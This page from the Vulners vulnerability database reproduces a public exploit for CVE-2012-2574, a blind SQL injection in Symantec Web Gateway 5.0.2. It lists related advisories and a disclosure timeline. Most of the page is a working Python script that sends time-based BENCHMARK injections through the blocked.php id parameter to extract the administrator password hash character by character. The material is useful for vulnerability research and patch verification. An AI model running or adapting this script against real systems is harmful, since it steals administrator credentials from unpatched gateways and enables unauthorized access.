Vulners
Lucene search
Symantec Web Gateway 5.0.2 Blind SQL Injection
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2012-2574 | 23 Jul 201200:00 | – | circl |
 | Symantec Web Gateway blocked.php Blind SQL Injection (CVE-2012-2574) | 14 Oct 201200:00 | – | checkpoint_advisories |
| Symantec Web Gateway blocked.php Blind SQL Injection - Ver2 (CVE-2012-2574) | 3 Mar 201400:00 | – | checkpoint_advisories |
 | CVE-2012-2574 | 23 Jul 201217:00 | – | cve |
 | CVE-2012-2574 | 23 Jul 201217:00 | – | cvelist |
 | EUVD-2012-2560 | 7 Oct 202500:30 | – | euvd |
 | CVE-2012-2574 | 23 Jul 201217:55 | – | nvd |
 | Symantec Web Gateway Multiple Vulnerabilities | 24 Jul 201200:00 | – | openvas |
 | Sql injection | 23 Jul 201217:55 | – | prion |
 | Symantec Web Gateway Security Issues | 20 Jul 201208:00 | – | symantec |
10
`#!/usr/bin/python
######################################################################################
# Exploit Title: Symantec Web Gateway 5.0.2 (blocked.php id parameter) Blind SQL Injection
# Date: Jul 23 2012
# Author: muts
# Version: Symantec Web Gateway 5.0.2
# Vendor URL: http://www.symantec.com
#
# Timeline:
#
# 29 May 2012: Vulnerability reported to CERT
# 30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
# 26 Jun 2012: Email received from Symantec for additional information
# 26 Jun 2012: Additional proofs of concept sent to Symantec
# 06 Jul 2012: Update received from Symantec with intent to fix
# 20 Jul 2012: Symantec patch released: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00
# 23 Jul 2012: Public Disclosure
#
######################################################################################
import urllib
import time
import sys
from time import sleep
# Set your timing variable. A minimum value of 200 (2 seconds) was tested on localhost.
# This might need to be higher on production systems.
timing=300
def check_char(i,j,timing):
url = ("https://172.16.254.111/spywall/blocked.php?d=3&file=3&id=1)" +
" or 1=(select IF(conv(mid((select password from users),%s,1),16,10) "+
"= %s,BENCHMARK(%s,rand()),11) LIMIT 1&history=-2&u=3") % (j,i,timing)
start=time.time()
urllib.urlopen(url)
end =time.time()
howlong=int(end-start)
return howlong
counter=0
startexploit=time.time()
print "[*] Symantec \"Wall of Spies\" hash extractor"
print "[*] Time Based SQL injection, please wait..."
sys.stdout.write("[*] Admin hash is : ")
sys.stdout.flush()
for m in range(1,33):
for n in range(0,16):
counter= counter+1
output = check_char(n,m,timing)
if output > ((timing/100)-1):
byte =hex(n)[2:]
sys.stdout.write(byte)
sys.stdout.flush()
break
endexploit=time.time()
totalrun=str(endexploit-startexploit)
print "\n[*] Total of %s queries in %s seconds" % (counter,totalrun)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Jul 2012 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.01097